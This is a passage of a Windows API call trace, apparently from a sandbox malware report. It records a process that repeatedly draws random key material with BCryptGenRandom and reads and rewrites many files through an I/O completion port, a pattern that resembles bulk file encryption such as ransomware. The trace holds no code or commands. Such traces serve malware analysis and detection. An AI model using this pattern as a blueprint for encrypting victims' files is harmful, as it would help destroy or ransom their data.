lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.127] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.127] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.127] free (_Block=0x3e305b8) [0121.127] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.127] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.127] free (_Block=0x1fa91d0) [0121.127] free (_Block=0x77d7a8) [0121.127] free (_Block=0x1fa90b8) [0121.127] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.133] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x55a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0121.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.145] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.146] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.146] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.146] free (_Block=0x3e305b8) [0121.146] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.146] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.146] free (_Block=0x1fa91d0) [0121.146] free (_Block=0x77d7a8) [0121.146] free (_Block=0x1fa90b8) [0121.146] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0121.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.152] CloseHandle (hObject=0x3bc) returned 1 [0121.152] free (_Block=0x1ff1e60) [0121.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.160] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.161] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.161] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.161] free (_Block=0x3e305b8) [0121.161] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.161] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.161] free (_Block=0x1fa91d0) [0121.161] free (_Block=0x77d7a8) [0121.161] free (_Block=0x1fa90b8) [0121.161] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0121.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.224] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0121.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.228] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.228] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.228] free (_Block=0x3e305b8) [0121.228] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.228] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.229] free (_Block=0x1fa91d0) [0121.229] free (_Block=0x77d7a8) [0121.229] free (_Block=0x1fa90b8) [0121.229] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0121.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.230] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0121.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.273] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6630, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.276] CloseHandle (hObject=0x13c0) returned 1 [0121.276] free (_Block=0x3df0008) [0121.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.315] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.315] free (_Block=0x3e305b8) [0121.315] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.315] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.316] free (_Block=0x1fa91d0) [0121.316] free (_Block=0x77d7a8) [0121.316] free (_Block=0x1fa90b8) [0121.316] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.317] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6ba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.362] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3b29, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0121.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.375] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.375] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.375] free (_Block=0x3e305b8) [0121.375] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.375] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.375] free (_Block=0x1fa91d0) [0121.375] free (_Block=0x77d7a8) [0121.376] free (_Block=0x1fa90b8) [0121.376] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.377] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.388] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4cc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.390] CloseHandle (hObject=0x2f4) returned 1 [0121.390] free (_Block=0x1ff1e60) [0121.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.400] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.400] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.401] free (_Block=0x3e305b8) [0121.401] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.401] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.401] free (_Block=0x1fa91d0) [0121.401] free (_Block=0x77d7a8) [0121.401] free (_Block=0x1fa90b8) [0121.401] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.433] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x5760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0121.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.437] CloseHandle (hObject=0x2f4) returned 1 [0121.437] free (_Block=0x1ff1e60) [0121.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.453] CloseHandle (hObject=0x13c0) returned 1 [0121.453] free (_Block=0x3df0008) [0121.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.549] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x55ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0121.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.805] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc53a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.807] CloseHandle (hObject=0x2f4) returned 1 [0121.807] free (_Block=0x3df0008) [0121.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.832] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.832] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.832] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.832] free (_Block=0x3e305b8) [0121.832] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.832] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.833] free (_Block=0x1fa91d0) [0121.833] free (_Block=0x77d7a8) [0121.833] free (_Block=0x1fa90b8) [0121.833] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.833] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.864] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xfd00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.865] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.866] CloseHandle (hObject=0x2f4) returned 1 [0121.866] free (_Block=0x3df0008) [0121.866] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.877] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.877] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.877] free (_Block=0x3e305b8) [0121.877] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.877] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.878] free (_Block=0x1fa91d0) [0121.878] free (_Block=0x77d7a8) [0121.878] free (_Block=0x1fa90b8) [0121.878] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.880] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xabb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.880] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.881] CloseHandle (hObject=0x2f4) returned 1 [0121.881] free (_Block=0x3df0008) [0121.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0121.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0121.901] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.901] free (_Block=0x3e305b8) [0121.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.901] calloc (_Count=0x82, _Size=0x4) returned 